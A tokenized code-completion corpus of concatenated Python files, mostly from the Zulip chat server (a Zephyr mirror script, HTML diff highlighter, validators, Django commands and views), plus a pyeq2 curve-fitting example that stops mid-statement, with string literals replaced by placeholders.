add_subscriptions ( list ( { "<STR_LIT:name>" : stream } for stream in zephyr_subscriptions ) , <EOL> authorization_errors_fatal = False ) <EOL> if res . get ( "<STR_LIT:result>" ) != "<STR_LIT:success>" : <EOL> logger . error ( "<STR_LIT>" % ( res [ "<STR_LIT>" ] , ) ) <EOL> return <EOL> already = res . get ( "<STR_LIT>" ) <EOL> new = res . get ( "<STR_LIT>" ) <EOL> unauthorized = res . get ( "<STR_LIT>" ) <EOL> if verbose : <EOL> if already is not None and len ( already ) > <NUM_LIT:0> : <EOL> logger . info ( "<STR_LIT>" % ( "<STR_LIT:U+002CU+0020>" . join ( list ( already . values ( ) ) [ <NUM_LIT:0> ] ) , ) ) <EOL> if new is not None and len ( new ) > <NUM_LIT:0> : <EOL> logger . info ( "<STR_LIT>" % ( "<STR_LIT:U+002CU+0020>" . join ( list ( new . values ( ) ) [ <NUM_LIT:0> ] ) , ) ) <EOL> if unauthorized is not None and len ( unauthorized ) > <NUM_LIT:0> : <EOL> logger . info ( "<STR_LIT:\n>" + "<STR_LIT:\n>" . join ( textwrap . wrap ( """<STR_LIT>""" ) ) + "<STR_LIT>" % ( "<STR_LIT:U+002CU+0020>" . join ( unauthorized ) , ) ) <EOL> if len ( skipped ) > <NUM_LIT:0> : <EOL> if verbose : <EOL> logger . info ( "<STR_LIT:\n>" + "<STR_LIT:\n>" . join ( textwrap . wrap ( """<STR_LIT>""" ) ) + "<STR_LIT:\n>" ) <EOL> for ( cls , instance , recipient , reason ) in skipped : <EOL> if verbose : <EOL> if reason != "<STR_LIT>" : <EOL> logger . info ( "<STR_LIT>" % ( cls , instance , recipient , reason ) ) <EOL> else : <EOL> logger . info ( "<STR_LIT>" % ( cls , instance , recipient ) ) <EOL> if len ( skipped ) > <NUM_LIT:0> : <EOL> if verbose : <EOL> logger . info ( "<STR_LIT:\n>" + "<STR_LIT:\n>" . join ( textwrap . wrap ( """<STR_LIT>""" ) ) + "<STR_LIT:\n>" ) <EOL> def valid_stream_name ( name ) : <EOL> return name != "<STR_LIT>" <EOL> def parse_zephyr_subs ( verbose = False ) : <EOL> zephyr_subscriptions = set ( ) <EOL> subs_file = os . path . join ( os . environ [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> if not os . path . 
exists ( subs_file ) : <EOL> if verbose : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return [ ] <EOL> for line in open ( subs_file , "<STR_LIT:r>" ) . readlines ( ) : <EOL> line = line . strip ( ) <EOL> if len ( line ) == <NUM_LIT:0> : <EOL> continue <EOL> try : <EOL> ( cls , instance , recipient ) = line . split ( "<STR_LIT:U+002C>" ) <EOL> cls = cls . replace ( "<STR_LIT>" , options . user ) <EOL> instance = instance . replace ( "<STR_LIT>" , options . user ) <EOL> recipient = recipient . replace ( "<STR_LIT>" , options . user ) <EOL> if not valid_stream_name ( cls ) : <EOL> if verbose : <EOL> logger . error ( "<STR_LIT>" % ( line , ) ) <EOL> continue <EOL> except Exception : <EOL> if verbose : <EOL> logger . error ( "<STR_LIT>" % ( line , ) ) <EOL> continue <EOL> zephyr_subscriptions . add ( ( cls . strip ( ) , instance . strip ( ) , recipient . strip ( ) ) ) <EOL> return zephyr_subscriptions <EOL> def open_logger ( ) : <EOL> if options . log_path is not None : <EOL> log_file = options . log_path <EOL> elif options . forward_class_messages : <EOL> if options . test_mode : <EOL> log_file = "<STR_LIT>" <EOL> else : <EOL> log_file = "<STR_LIT>" <EOL> else : <EOL> f = tempfile . NamedTemporaryFile ( prefix = "<STR_LIT>" % ( options . user , ) , <EOL> delete = False ) <EOL> log_file = f . name <EOL> f . close ( ) <EOL> logger = logging . getLogger ( __name__ ) <EOL> log_format = "<STR_LIT>" <EOL> formatter = logging . Formatter ( log_format ) <EOL> logging . basicConfig ( format = log_format ) <EOL> logger . setLevel ( logging . DEBUG ) <EOL> file_handler = logging . FileHandler ( log_file ) <EOL> file_handler . setFormatter ( formatter ) <EOL> logger . addHandler ( file_handler ) <EOL> return logger <EOL> def configure_logger ( logger , direction_name ) : <EOL> if direction_name is None : <EOL> log_format = "<STR_LIT>" <EOL> else : <EOL> log_format = "<STR_LIT>" + direction_name + "<STR_LIT>" <EOL> formatter = logging . 
Formatter ( log_format ) <EOL> for handler in logger . handlers : <EOL> handler . setFormatter ( formatter ) <EOL> root_logger = logging . getLogger ( ) <EOL> for handler in root_logger . handlers : <EOL> handler . setFormatter ( formatter ) <EOL> def parse_args ( ) : <EOL> parser = optparse . OptionParser ( ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = False , <EOL> help = optparse . SUPPRESS_HELP , <EOL> action = '<STR_LIT:store_true>' ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = False , <EOL> help = optparse . SUPPRESS_HELP , <EOL> action = '<STR_LIT:store_true>' ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> default = "<STR_LIT>" , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> help = optparse . SUPPRESS_HELP , <EOL> default = True , <EOL> action = '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> help = optparse . SUPPRESS_HELP , <EOL> default = False , <EOL> action = '<STR_LIT:store_true>' ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = True , <EOL> dest = '<STR_LIT>' , <EOL> help = optparse . SUPPRESS_HELP , <EOL> action = '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = False , <EOL> help = optparse . SUPPRESS_HELP , <EOL> action = '<STR_LIT:store_true>' ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = False , <EOL> action = '<STR_LIT:store_true>' ) <EOL> parser . 
add_option ( '<STR_LIT>' , <EOL> default = False , <EOL> action = '<STR_LIT:store_true>' ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = DEFAULT_SITE , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = None , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = os . environ [ "<STR_LIT>" ] , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = "<STR_LIT>" , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = None , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = None , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = None , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = False , <EOL> action = '<STR_LIT:store_true>' , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = False , <EOL> help = optparse . SUPPRESS_HELP , <EOL> action = '<STR_LIT:store_true>' ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = os . path . join ( os . environ [ "<STR_LIT>" ] , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> return parser . parse_args ( ) <EOL> def die_gracefully ( signal , frame ) : <EOL> if CURRENT_STATE == States . ZulipToZephyr or CURRENT_STATE == States . ChildSending : <EOL> os . _exit ( <NUM_LIT:1> ) <EOL> if CURRENT_STATE == States . ZephyrToZulip and not options . use_sessions : <EOL> try : <EOL> zephyr . _z . cancelSubs ( ) <EOL> except IOError : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> signal . signal ( signal . SIGCHLD , signal . SIG_DFL ) <EOL> signal . signal ( signal . 
SIGINT , die_gracefully ) <EOL> ( options , args ) = parse_args ( ) <EOL> logger = open_logger ( ) <EOL> configure_logger ( logger , "<STR_LIT>" ) <EOL> pyzephyr_lib_path = "<STR_LIT>" % ( os . uname ( ) [ <NUM_LIT:4> ] , sys . version [ <NUM_LIT:0> : <NUM_LIT:3> ] ) <EOL> sys . path [ : <NUM_LIT:0> ] = [ os . path . join ( options . root_path , '<STR_LIT>' ) , <EOL> options . root_path , <EOL> os . path . join ( options . root_path , "<STR_LIT>" ) , <EOL> os . path . join ( options . root_path , pyzephyr_lib_path ) ] <EOL> if os . environ . get ( "<STR_LIT>" ) is not None : <EOL> api_key = os . environ . get ( "<STR_LIT>" ) <EOL> else : <EOL> if not os . path . exists ( options . api_key_file ) : <EOL> logger . error ( "<STR_LIT:\n>" + "<STR_LIT:\n>" . join ( textwrap . wrap ( """<STR_LIT>""" % ( options . api_key_file , ) ) ) ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> api_key = open ( options . api_key_file ) . read ( ) . strip ( ) <EOL> os . environ [ "<STR_LIT>" ] = api_key <EOL> if options . nagios_path is None and options . nagios_class is not None : <EOL> logger . error ( "<STR_LIT:\n>" + "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> zulip_account_email = options . user + "<STR_LIT>" <EOL> import zulip <EOL> zulip_client = zulip . Client ( <EOL> email = zulip_account_email , <EOL> api_key = api_key , <EOL> verbose = True , <EOL> client = "<STR_LIT>" , <EOL> site = options . site ) <EOL> start_time = time . time ( ) <EOL> if options . sync_subscriptions : <EOL> configure_logger ( logger , None ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> add_zulip_subscriptions ( True ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> if not options . test_mode : <EOL> pgrep_query = "<STR_LIT>" <EOL> if options . shard is not None : <EOL> pgrep_query = "<STR_LIT>" % ( pgrep_query , options . shard ) <EOL> elif options . user is not None : <EOL> pgrep_query = "<STR_LIT>" % ( pgrep_query , options . user ) <EOL> proc = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT>' , os . 
environ [ "<STR_LIT>" ] , "<STR_LIT>" , pgrep_query ] , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> out , _err_unused = proc . communicate ( ) <EOL> for pid in map ( int , out . split ( ) ) : <EOL> if pid == os . getpid ( ) or pid == os . getppid ( ) : <EOL> continue <EOL> logger . info ( "<STR_LIT>" % ( pid , ) ) <EOL> try : <EOL> os . kill ( pid , signal . SIGINT ) <EOL> except OSError : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> if options . shard is not None and set ( options . shard ) != set ( "<STR_LIT:a>" ) : <EOL> options . forward_personals = False <EOL> options . forward_from_zulip = False <EOL> if options . forward_mail_zephyrs is None : <EOL> options . forward_mail_zephyrs = subscribed_to_mail_messages ( ) <EOL> if options . session_path is None : <EOL> options . session_path = "<STR_LIT>" % ( options . user , ) <EOL> if options . forward_from_zulip : <EOL> child_pid = os . fork ( ) <EOL> if child_pid == <NUM_LIT:0> : <EOL> CURRENT_STATE = States . ZulipToZephyr <EOL> configure_logger ( logger , "<STR_LIT>" ) <EOL> zulip_to_zephyr ( options ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> else : <EOL> child_pid = None <EOL> CURRENT_STATE = States . ZephyrToZulip <EOL> import zephyr <EOL> logger_name = "<STR_LIT>" <EOL> if options . shard is not None : <EOL> logger_name += "<STR_LIT>" % ( options . shard , ) <EOL> configure_logger ( logger , logger_name ) <EOL> signal . signal ( signal . SIGCHLD , signal . SIG_IGN ) <EOL> zephyr_to_zulip ( options ) </s>
<s> from __future__ import print_function <EOL> import re <EOL> from collections import defaultdict <EOL> import os <EOL> import sys <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:..>' ) ) <EOL> from zerver . lib . user_agent import parse_user_agent <EOL> user_agents_parsed = defaultdict ( int ) <EOL> user_agents_path = os . path . join ( os . path . dirname ( __file__ ) , "<STR_LIT>" ) <EOL> parse_errors = <NUM_LIT:0> <EOL> for line in open ( user_agents_path ) . readlines ( ) : <EOL> line = line . strip ( ) <EOL> match = re . match ( '<STR_LIT>' , line ) <EOL> if match is None : <EOL> print ( line ) <EOL> continue <EOL> groupdict = match . groupdict ( ) <EOL> count = groupdict [ "<STR_LIT:count>" ] <EOL> user_agent = groupdict [ "<STR_LIT>" ] <EOL> ret = parse_user_agent ( user_agent ) <EOL> if ret is None : <EOL> print ( "<STR_LIT>" , line ) <EOL> parse_errors += <NUM_LIT:1> <EOL> continue <EOL> user_agents_parsed [ ret [ "<STR_LIT:name>" ] ] += int ( count ) <EOL> for key in user_agents_parsed : <EOL> print ( "<STR_LIT:U+0020>" , key , user_agents_parsed [ key ] ) <EOL> print ( "<STR_LIT>" % ( parse_errors , ) ) </s>
<s> from __future__ import absolute_import <EOL> from django . conf import settings <EOL> from diff_match_patch import diff_match_patch <EOL> import platform <EOL> import logging <EOL> def highlight_with_class ( klass , text ) : <EOL> return '<STR_LIT>' % ( klass , text ) <EOL> def highlight_inserted ( text ) : <EOL> return highlight_with_class ( '<STR_LIT>' , text ) <EOL> def highlight_deleted ( text ) : <EOL> return highlight_with_class ( '<STR_LIT>' , text ) <EOL> def highlight_replaced ( text ) : <EOL> return highlight_with_class ( '<STR_LIT>' , text ) <EOL> def chunkize ( text , in_tag ) : <EOL> start = <NUM_LIT:0> <EOL> idx = <NUM_LIT:0> <EOL> chunks = [ ] <EOL> for c in text : <EOL> if c == '<STR_LIT:<>' : <EOL> in_tag = True <EOL> if start != idx : <EOL> chunks . append ( ( '<STR_LIT:text>' , text [ start : idx ] ) ) <EOL> start = idx <EOL> elif c == '<STR_LIT:>>' : <EOL> in_tag = False <EOL> if start != idx + <NUM_LIT:1> : <EOL> chunks . append ( ( '<STR_LIT>' , text [ start : idx + <NUM_LIT:1> ] ) ) <EOL> start = idx + <NUM_LIT:1> <EOL> idx += <NUM_LIT:1> <EOL> if start != idx : <EOL> chunks . append ( ( '<STR_LIT>' if in_tag else '<STR_LIT:text>' , text [ start : idx ] ) ) <EOL> return chunks , in_tag <EOL> def highlight_chunks ( chunks , highlight_func ) : <EOL> retval = '<STR_LIT>' <EOL> for type , text in chunks : <EOL> if type == '<STR_LIT:text>' : <EOL> retval += highlight_func ( text ) <EOL> else : <EOL> retval += text <EOL> return retval <EOL> def verify_html ( html ) : <EOL> in_tag = False <EOL> for c in html : <EOL> if c == '<STR_LIT:<>' : <EOL> if in_tag : <EOL> return False <EOL> in_tag = True <EOL> elif c == '<STR_LIT:>>' : <EOL> if not in_tag : <EOL> return False <EOL> in_tag = False <EOL> if in_tag : <EOL> return False <EOL> return True <EOL> def highlight_html_differences ( s1 , s2 ) : <EOL> differ = diff_match_patch ( ) <EOL> ops = differ . diff_main ( s1 , s2 ) <EOL> differ . 
diff_cleanupSemantic ( ops ) <EOL> retval = '<STR_LIT>' <EOL> in_tag = False <EOL> idx = <NUM_LIT:0> <EOL> while idx < len ( ops ) : <EOL> op , text = ops [ idx ] <EOL> next_op = None <EOL> if idx != len ( ops ) - <NUM_LIT:1> : <EOL> next_op , next_text = ops [ idx + <NUM_LIT:1> ] <EOL> if op == diff_match_patch . DIFF_DELETE and next_op == diff_match_patch . DIFF_INSERT : <EOL> chunks , in_tag = chunkize ( next_text , in_tag ) <EOL> retval += highlight_chunks ( chunks , highlight_replaced ) <EOL> idx += <NUM_LIT:1> <EOL> elif op == diff_match_patch . DIFF_INSERT and next_op == diff_match_patch . DIFF_DELETE : <EOL> chunks , in_tag = chunkize ( text , in_tag ) <EOL> retval += highlight_chunks ( chunks , highlight_replaced ) <EOL> idx += <NUM_LIT:1> <EOL> elif op == diff_match_patch . DIFF_DELETE : <EOL> retval += highlight_deleted ( '<STR_LIT>' ) <EOL> elif op == diff_match_patch . DIFF_INSERT : <EOL> chunks , in_tag = chunkize ( text , in_tag ) <EOL> retval += highlight_chunks ( chunks , highlight_inserted ) <EOL> elif op == diff_match_patch . DIFF_EQUAL : <EOL> chunks , in_tag = chunkize ( text , in_tag ) <EOL> retval += text <EOL> idx += <NUM_LIT:1> <EOL> if not verify_html ( retval ) : <EOL> from zerver . lib . actions import internal_send_message <EOL> logging . getLogger ( '<STR_LIT>' ) . error ( '<STR_LIT>' ) <EOL> if settings . ERROR_BOT is not None : <EOL> subject = "<STR_LIT>" % ( platform . node ( ) , ) <EOL> internal_send_message ( settings . ERROR_BOT , "<STR_LIT>" , <EOL> "<STR_LIT>" , subject , "<STR_LIT>" ) <EOL> return s2 <EOL> return retval </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import six <EOL> def check_string ( var_name , val ) : <EOL> if not isinstance ( val , six . string_types ) : <EOL> return '<STR_LIT>' % ( var_name , ) <EOL> return None <EOL> def check_int ( var_name , val ) : <EOL> if not isinstance ( val , int ) : <EOL> return '<STR_LIT>' % ( var_name , ) <EOL> return None <EOL> def check_bool ( var_name , val ) : <EOL> if not isinstance ( val , bool ) : <EOL> return '<STR_LIT>' % ( var_name , ) <EOL> return None <EOL> def check_none_or ( sub_validator ) : <EOL> def f ( var_name , val ) : <EOL> if val is None : <EOL> return None <EOL> else : <EOL> return sub_validator ( var_name , val ) <EOL> return f <EOL> def check_list ( sub_validator , length = None ) : <EOL> def f ( var_name , val ) : <EOL> if not isinstance ( val , list ) : <EOL> return '<STR_LIT>' % ( var_name , ) <EOL> if length is not None and length != len ( val ) : <EOL> return '<STR_LIT>' % ( var_name , length ) <EOL> if sub_validator : <EOL> for i , item in enumerate ( val ) : <EOL> vname = '<STR_LIT>' % ( var_name , i ) <EOL> error = sub_validator ( vname , item ) <EOL> if error : <EOL> return error <EOL> return None <EOL> return f <EOL> def check_dict ( required_keys ) : <EOL> def f ( var_name , val ) : <EOL> if not isinstance ( val , dict ) : <EOL> return '<STR_LIT>' % ( var_name , ) <EOL> for k , sub_validator in required_keys : <EOL> if k not in val : <EOL> return '<STR_LIT>' % ( k , var_name ) <EOL> vname = '<STR_LIT>' % ( var_name , k ) <EOL> error = sub_validator ( vname , val [ k ] ) <EOL> if error : <EOL> return error <EOL> return None <EOL> return f <EOL> def check_variable_type ( allowed_type_funcs ) : <EOL> """<STR_LIT>""" <EOL> def enumerated_type_check ( var_name , val ) : <EOL> for func in allowed_type_funcs : <EOL> if not func ( var_name , val ) : <EOL> return None <EOL> return '<STR_LIT>' % ( var_name , ) <EOL> return enumerated_type_check <EOL> def equals ( expected_val ) : 
<EOL> def f ( var_name , val ) : <EOL> if val != expected_val : <EOL> return '<STR_LIT>' % ( var_name , expected_val , val ) <EOL> return None <EOL> return f </s>
<s> from __future__ import absolute_import <EOL> from __future__ import print_function <EOL> from django . core . management . base import BaseCommand <EOL> from django . core . management import CommandError <EOL> from zerver . lib . queue import SimpleQueueClient <EOL> class Command ( BaseCommand ) : <EOL> def add_arguments ( self , parser ) : <EOL> parser . add_argument ( '<STR_LIT>' , metavar = '<STR_LIT>' , type = str , <EOL> help = "<STR_LIT>" ) <EOL> help = "<STR_LIT>" <EOL> def handle ( self , * args , ** options ) : <EOL> queue_name = options [ '<STR_LIT>' ] <EOL> queue = SimpleQueueClient ( ) <EOL> queue . ensure_queue ( queue_name , lambda : None ) <EOL> queue . channel . queue_purge ( queue_name ) <EOL> print ( "<STR_LIT>" ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . RunSQL ( "<STR_LIT>" , <EOL> reverse_sql = "<STR_LIT>" ) , <EOL> ] </s>
<s> from django . core . exceptions import ValidationError <EOL> from django . views . decorators . csrf import csrf_exempt <EOL> from zerver . lib . response import json_success , json_error <EOL> from zerver . lib . actions import check_add_realm_emoji , do_remove_realm_emoji <EOL> from zerver . lib . rest import rest_dispatch as _rest_dispatch <EOL> rest_dispatch = csrf_exempt ( ( lambda request , * args , ** kwargs : _rest_dispatch ( request , globals ( ) , * args , ** kwargs ) ) ) <EOL> def list_emoji ( request , user_profile ) : <EOL> return json_success ( { '<STR_LIT>' : user_profile . realm . get_emoji ( ) } ) <EOL> def upload_emoji ( request , user_profile ) : <EOL> emoji_name = request . POST . get ( '<STR_LIT:name>' , None ) <EOL> emoji_url = request . POST . get ( '<STR_LIT:url>' , None ) <EOL> try : <EOL> check_add_realm_emoji ( user_profile . realm , emoji_name , emoji_url ) <EOL> except ValidationError as e : <EOL> return json_error ( e . message_dict ) <EOL> return json_success ( ) <EOL> def delete_emoji ( request , user_profile , emoji_name ) : <EOL> do_remove_realm_emoji ( user_profile . realm , emoji_name ) <EOL> return json_success ( { } ) </s>
<s> from __future__ import absolute_import <EOL> from django . core . management . base import BaseCommand <EOL> from zerver . models import Subscription <EOL> class Command ( BaseCommand ) : <EOL> help = """<STR_LIT>""" <EOL> def handle ( self , * args , ** options ) : <EOL> for subscription in Subscription . objects . all ( ) : <EOL> subscription . desktop_notifications = subscription . notifications <EOL> subscription . audible_notifications = subscription . notifications <EOL> subscription . save ( update_fields = [ "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) </s>
<s> from __future__ import print_function <EOL> from __future__ import unicode_literals <EOL> from __future__ import absolute_import <EOL> from __future__ import generators <EOL> import os , sys , inspect , copy <EOL> if - <NUM_LIT:1> != sys . path [ <NUM_LIT:0> ] . find ( '<STR_LIT>' ) : raise Exception ( '<STR_LIT>' ) <EOL> exampleFileDirectory = sys . path [ <NUM_LIT:0> ] [ : sys . path [ <NUM_LIT:0> ] . rfind ( os . sep ) ] <EOL> pyeq2IimportDirectory = os . path . join ( os . path . join ( exampleFileDirectory , '<STR_LIT:..>' ) , '<STR_LIT:..>' ) <EOL> if pyeq2IimportDirectory not in sys . path : <EOL> sys . path . append ( pyeq2IimportDirectory ) <EOL> import pyeq2 <EOL> def UniqueCombinations ( items , n ) : <EOL> if n == <NUM_LIT:0> : <EOL> yield [ ] <EOL> else : <EOL> for i in xrange ( len ( items ) ) : <EOL> for cc in UniqueCombinations ( items [ i + <NUM_LIT:1> : ] , n - <NUM_LIT:1> ) : <EOL> yield [ items [ i ] ] + cc <EOL> def UniqueCombinations2 ( items2 , n2 ) : <EOL> if n2 == <NUM_LIT:0> : <EOL> yield [ ] <EOL> else : <EOL> for i2 in xrange ( len ( items2 ) ) : <EOL> for cc2 in UniqueCombinations2 ( items2 [ i2 + <NUM_LIT:1> : ] , n2 - <NUM_LIT:1> ) : <EOL> yield [ items2 [ i2 ] ] + cc2 <EOL> def SetParametersAndFit ( inEquation , resultList , inPrintStatus ) : <EOL> try : <EOL> if len ( inEquation . GetCoefficientDesignators ( ) ) > len ( inEquation . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) : <EOL> return <EOL> if inEquation . ShouldDataBeRejected ( inEquation ) : <EOL> return <EOL> if inPrintStatus : <EOL> print ( '<STR_LIT>' , inEquation . __module__ , "<STR_LIT:'>" + inEquation . GetDisplayName ( ) + "<STR_LIT:'>" ) <EOL> inEquation . Solve ( ) <EOL> target = inEquation . CalculateAllDataFittingTarget ( inEquation . solvedCoefficients ) <EOL> if target > <NUM_LIT> : <EOL> return <EOL> except : <EOL> print ( "<STR_LIT>" + inEquation . __class__ . __name__ + '<STR_LIT:\n>' + str ( sys . 
exc_info ( ) [ <NUM_LIT:0> ] ) + '<STR_LIT:\n>' + str ( sys . exc_info ( ) [ <NUM_LIT:1> ] ) + '<STR_LIT:\n>' ) <EOL> return None <EOL> t0 = copy . deepcopy ( inEquation . __module__ ) <EOL> t1 = copy . deepcopy ( inEquation . __class__ . __name__ ) <EOL> t2 = copy . deepcopy ( inEquation . extendedVersionHandler . __class__ . __name__ . split ( '<STR_LIT:_>' ) [ <NUM_LIT:1> ] ) <EOL> t3 = copy . deepcopy ( target ) <EOL> t4 = copy . deepcopy ( inEquation . solvedCoefficients ) <EOL> t5 = copy . deepcopy ( inEquation . polyfunctional2DFlags ) <EOL> t6 = copy . deepcopy ( inEquation . xPolynomialOrder ) <EOL> t7 = copy . deepcopy ( inEquation . rationalNumeratorFlags ) <EOL> t8 = copy . deepcopy ( inEquation . rationalDenominatorFlags ) <EOL> resultList . append ( [ t0 , t1 , t2 , t3 , t4 , t5 , t6 , t7 , t8 ] ) <EOL> rawData = '''<STR_LIT>''' <EOL> resultList = [ ] <EOL> fittingTargetText = '<STR_LIT>' <EOL> externalCache = pyeq2 . dataCache ( ) <EOL> reducedDataCache = { } <EOL> smoothnessControl = <NUM_LIT:3> <EOL> for submodule in inspect . getmembers ( pyeq2 . Models_2D ) : <EOL> if inspect . ismodule ( submodule [ <NUM_LIT:1> ] ) : <EOL> for equationClass in inspect . getmembers ( submodule [ <NUM_LIT:1> ] ) : <EOL> if inspect . isclass ( equationClass [ <NUM_LIT:1> ] ) : <EOL> if equationClass [ <NUM_LIT:1> ] . splineFlag or equationClass [ <NUM_LIT:1> ] . userSelectablePolynomialFlag or equationClass [ <NUM_LIT:1> ] . userCustomizablePolynomialFlag or equationClass [ <NUM_LIT:1> ] . userSelectablePolyfunctionalFlag or equationClass [ <NUM_LIT:1> ] . userSelectableRationalFlag or equationClass [ <NUM_LIT:1> ] . userDefinedFunctionFlag : <EOL> continue <EOL> for extendedVersion in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if ( extendedVersion == '<STR_LIT>' ) and ( equationClass [ <NUM_LIT:1> ] . 
autoGenerateOffsetForm == False ) : <EOL> continue <EOL> equationInstance = equationClass [ <NUM_LIT:1> ] ( fittingTargetText , extendedVersion ) <EOL> if len ( equationInstance . GetCoefficientDesignators ( ) ) > smoothnessControl : <EOL> continue <EOL> equationInstance . dataCache = externalCache <EOL> if equationInstance . dataCache . allDataCacheDictionary == { } : <EOL> pyeq2 . dataConvertorService ( ) . ConvertAndSortColumnarASCII ( rawData , equationInstance , False ) <EOL> equationInstance . dataCache . CalculateNumberOfReducedDataPoints ( equationInstance ) <EOL> if reducedDataCache . has_key ( equationInstance . numberOfReducedDataPoints ) : <EOL> equationInstance . dataCache . reducedDataCacheDictionary = reducedDataCache [ equationInstance . numberOfReducedDataPoints ] <EOL> else : <EOL> equationInstance . dataCache . reducedDataCacheDictionary = { } <EOL> SetParametersAndFit ( equationInstance , resultList , True ) <EOL> if not reducedDataCache . has_key ( equationInstance . numberOfReducedDataPoints ) : <EOL> reducedDataCache [ equationInstance . numberOfReducedDataPoints ] = equationInstance . dataCache . reducedDataCacheDictionary <EOL> print ( ) <EOL> print ( '<STR_LIT>' ) <EOL> equationCount = <NUM_LIT:0> <EOL> maxPolyfunctionalCoefficients = <NUM_LIT:4> <EOL> polyfunctionalEquationList = pyeq2 . PolyFunctions . GenerateListForPolyfunctionals_2D ( ) <EOL> functionIndexList = range ( len ( polyfunctionalEquationList ) ) <EOL> for coeffCount in range ( <NUM_LIT:1> , maxPolyfunctionalCoefficients + <NUM_LIT:1> ) : <EOL> functionCombinations = UniqueCombinations ( functionIndexList , coeffCount ) <EOL> for functionCombination in functionCombinations : <EOL> if len ( functionCombination ) > smoothnessControl : <EOL> continue <EOL> equationInstance = pyeq2 . Models_2D . Polyfunctional . UserSelectablePolyfunctional ( fittingTargetText , '<STR_LIT>' , functionCombination , polyfunctionalEquationList ) <EOL> equationInstance . 
dataCache = externalCache <EOL> if equationInstance . dataCache . allDataCacheDictionary == { } : <EOL> pyeq2 . dataConvertorService ( ) . ConvertAndSortColumnarASCII ( rawData , equationInstance , False ) <EOL> equationInstance . dataCache . CalculateNumberOfReducedDataPoints ( equationInstance ) <EOL> if reducedDataCache . has_key ( equationInstance . numberOfReducedDataPoints ) : <EOL> equationInstance . dataCache . reducedDataCacheDictionary = reducedDataCache [ equationInstance . numberOfReducedDataPoints ] <EOL> else : <EOL> equationInstance . dataCache . reducedDataCacheDictionary = { } <EOL> SetParametersAndFit ( equationInstance , resultList , False ) <EOL> if not reducedDataCache . has_key ( equationInstance . numberOfReducedDataPoints ) : <EOL> reducedDataCache [ equationInstance . numberOfReducedDataPoints ] = equationInstance . dataCache . reducedDataCacheDictionary <EOL> equationCount += <NUM_LIT:1> <EOL> if ( equationCount % <NUM_LIT> ) == <NUM_LIT:0> : <EOL> print ( '<STR_LIT:U+0020>' , equationCount , '<STR_LIT>' ) <EOL> print ( ) <EOL> print ( '<STR_LIT>' ) <EOL> maxPolynomialOrderX = <NUM_LIT:5> <EOL> for polynomialOrderX in range ( maxPolynomialOrderX + <NUM_LIT:1> ) : <EOL> if ( polynomialOrderX + <NUM_LIT:1> ) > smoothnessControl : <EOL> continue <EOL> equationInstance = pyeq2 . Models_2D . Polynomial . UserSelectablePolynomial ( fittingTargetText , '<STR_LIT>' , polynomialOrderX ) <EOL> equationInstance . dataCache = externalCache <EOL> if equationInstance . dataCache . allDataCacheDictionary == { } : <EOL> pyeq2 . dataConvertorService ( ) . ConvertAndSortColumnarASCII ( rawData , equationInstance , False ) <EOL> equationInstance . dataCache . CalculateNumberOfReducedDataPoints ( equationInstance ) <EOL> if reducedDataCache . has_key ( equationInstance . numberOfReducedDataPoints ) : <EOL> equationInstance . dataCache . reducedDataCacheDictionary = reducedDataCache [ equationInstance . 
